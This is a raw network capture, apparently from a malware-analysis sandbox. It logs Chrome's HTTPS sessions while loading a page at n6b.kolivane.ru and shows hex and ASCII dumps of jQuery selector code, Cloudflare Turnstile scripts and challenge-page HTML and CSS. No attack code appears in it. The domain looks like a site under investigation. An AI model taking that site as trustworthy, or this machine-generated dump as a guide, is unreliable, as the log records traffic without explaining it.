                                                                                                    2024-12-23 18:11:43 UTC1378INData Raw: 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c
                                                                                                    Data Ascii: ("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||v.push("\\["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\
                                                                                                    2024-12-23 18:11:43 UTC1378INData Raw: 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 6e 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d
                                                                                                    Data Ascii: de)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)return l=!0,0;var n=!e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocum


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.549726104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:44 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:45 UTC471INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:45 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 47692
                                                                                                    Connection: close
                                                                                                    accept-ranges: bytes
                                                                                                    last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                    access-control-allow-origin: *
                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50df1c8a7cf4-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                    Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                    Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                                                    Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                                                    Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                                                                                    Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                                                                                    Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                                                                                                    Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                                                                                                    Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                                                                                                    Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                                                                                                    Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.549727104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:44 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                    Referer: https://n6b.kolivane.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:45 UTC1362INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 26678
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                    origin-agent-cluster: ?1
                                                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                    referrer-policy: same-origin
                                                                                                    document-policy: js-profiling
                                                                                                    2024-12-23 18:11:45 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 36 61 35 30 64 66 36 38 61 39 34 32 61 30 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                    Data Ascii: Server: cloudflareCF-RAY: 8f6a50df68a942a0-EWRalt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:45 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                    Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                    Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
